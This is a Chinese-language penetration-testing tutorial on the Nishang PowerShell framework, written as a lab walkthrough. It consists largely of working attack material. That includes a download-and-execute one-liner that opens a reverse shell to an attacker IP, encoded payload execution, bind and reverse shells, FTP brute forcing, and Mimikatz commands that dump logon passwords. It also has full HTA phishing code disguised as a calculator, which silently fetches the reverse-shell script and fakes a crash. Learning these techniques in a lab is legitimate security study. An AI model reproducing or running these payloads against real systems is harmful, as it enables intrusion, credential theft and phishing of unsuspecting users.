Final——Nishang

1、介绍

• Nishang是基于PowerShell的渗透测试专用工具，它集成了框架、脚本和各类payload，被普遍应用于渗透测试的各个阶段。

2、使用

• 下载脚本工具：Nishang
• Nishang须要咱们的Powershell版本在v3以上才能使用。
  • 查看当前Powershell版本：get-host
    
• 进入相应目录下
• 导入框架:Import-Module .\nishang.psm1
• 模块介绍
  
  • 信息搜集：Gather
  • 域相关脚本：Get-Unconstrained
  • 一个ASPX的Webshell：Antak Webshell
  • 后门：Backdoors
  • Client进行有效钓鱼：Client
  • 权限提高：Escalation
  • 更详细的介绍和使用咱们学习参考Powershell 渗透测试工具-Nishang
• 导入框架后，在使用对应脚本时，能够使用Get-Help 脚本名称 -full获得一些使用提示
• 两种在内存当中去加载脚本的方式
  • powershell iex (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]（IEX为远程下载脚本）
  • 第二种：
    • 使用Invoke-Encode脚原本将咱们现有的脚本编码压缩：Invoke-Encode -DataToEncode "nishang-master\Shells\Invoke-PowerShellTcp.ps1" -OutCommand
    • 在目标上执行：powershell -e [encodedscript]

3、Nishang渗透测试

一、TCP交互式Shell

• Invoke-PowerShellTcp是PowerShell交互式正向链接或反向链接shell，且基于TCP协议。
• 参数
  • -Port须要正向监听的端口或要反向链接的端口。
  • -Bind正向链接
  • -IPAddress选择反向链接时须要链接到的IP地址
  • -Reverse反向链接
• 正向链接
  • 在靶机运行脚本，监听端口5330：Invoke-PowerShellTcp -Bind -Port 5330
  • 使用nc链接到靶机端口5330：nc -nv 192.168.17.131 5330（这里IP为win10）
    
    成功获取shell~
• 反向链接
  • 使用nc监听本地端口5330：nc -ltp 5330
  • 在靶机上反弹shell：Invoke-PowerShellTcp -Reverse -IPAddress 192.168.17.130 -Port 5330（这里IP为kali）
    
    成功获取shell~
• 脚本分析
  • 咱们先使用Get-Help Invoke-PowerShellTcp -full查看信息（如下为部分，咱们能够重点看语法、说明还有示例，这条命令所显示的就是脚本中的注释部分~）
    
  • 运行参数
    
  • 主函数部分

    • 咱们能够参考所学的socket编程，在wireshark中抓包，咱们能够看到TCP数据包，脚本中将靶机做为服务端，在创建三次握手后，服务端会向攻击方发送数据

      $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
      $stream.Write($sendbytes,0,$sendbytes.Length)

    • 攻击方获取shell后输入命令时，靶机会接收并执行相应命令，在输出

      $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

二、服务爆破

• 在以前的学习中咱们利用Nishang中的扫描模块，尝试了对FTP服务器的爆破，效果以下：
  
• 显示爆破过程：Invoke-BruteForce -ComputerName 192.168.80.129 -UserList C:\Users\ASUS\Desktop\username.txt -PasswordList C:\Users\ASUS\Desktop\pass.txt -Service ftp -verbose
  

• wireshark中能够看到当爆破后，ftp服务器端与本地的信息交互，本地确认完获得结果后退出。

  # 获取返回信息
  $result = $ftpRequest.GetResponse()
  $message = $result.BannerMessage + $result.WelcomeMessage
  
  # 打印信息到控制台
  Write-Output "Match $username : $Password"
  $success = $true

三、利用HTA反弹获取shell

• Nishang中有对客户端进行钓鱼的模块——Client，利用该模块生成各类感染的文件如HTA、Word，来执行powershell脚本发动攻击。
• HTA，HTML-Application的缩写，它直接将某个html页面保存成hta的格式，打开时显示为窗口交互界面，就是一个独立的应用软件。
• 使用Nishang中的Out-HTA生成带有payload的hta文件：Out-HTA -PayloadScript C:\Users\ASUS\Desktop\nishang-master\Shells\Invoke-PowerShellTcpOneLine.ps1
  
  这里生成的文件是闪退的...长时间打不开..
• 借用一篇文中的代码，修改这个生成hta的脚本。

  • 首先生成一个能够弹出系统计算器的代码

    <title>Caculate</title>
    <center>
    <h1>Caculate.exe</h1>
    <br>
    <h2>Loading...</h2>
    <br>
    [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]100%
    <br>
    </center>
    <script language="VBScript">
    Set Hackdo = CreateObject("Wscript.Shell")
    Set Check = CreateObject("Scripting.FileSystemObject")
    If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
      Hackdo.Run "powershell.exe -nop -w hidden calc.exe"
    End If
    </script>

    Hackdo.Run为调用Wscript.shell中的运行外部程序的函数——run，后面跟着一条powershell命令，用powershell开启计算器。
    

  • 而后咱们能够设置出伪装闪退效果，在后面添加下面代码

    Hackdo.Run "taskkill /f /im mshta.exe"

    这里咱们只是杀死了mshta.exe这个进程，而shellcode是注入在powershell中执行的，它的进程还在~
• 要生成反弹shell，就要修改后面调用powershell执行的部分，原代码中是在生成时用参数调用生成reverse的脚本：Out-HTA -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1，可是kali那边监听没反应

• 因而换成了直接远程调用脚本，并用vbhide用来隐藏powershell的弹窗。主要代码以下：

  <body>
    <title>XXX-exp</title>
    <center>
    <h1>Caculate.exe</h1>
    <br>
    <h2>Loading...</h2>
   <br>
   [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]100%
   <br>
   </center>
   <script language="VBScript">
    Set Hackdo = CreateObject("Wscript.Shell")
    Set Check = CreateObject("Scripting.FileSystemObject")
    If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
     Hackdo.Run "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.80.131 -port 5330",vbhide
    Hackdo.Run "taskkill /f /im mshta.exe"
   End If
   </script>     
    </body>
    </html>

  • windows中生成HTA：out-hta
  • kali下监听端口：nc -lv 5330
  • windows下打开HTA

• 终于获取shell
  

四、Mimikatz结合Powershell 获取目标主机帐号密码

• mimikatz是由C语言编写的开源小工具，功能很是强大。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证，以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术。
• 注意咱们要使用管理员身份运行PowerShell
• 导入Nishang框架Import-Module .\nishang.psm1
• 使用Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'获取密码
  

参考资料

• Powershell 渗透测试工具-Nishang
• Powershell + HTA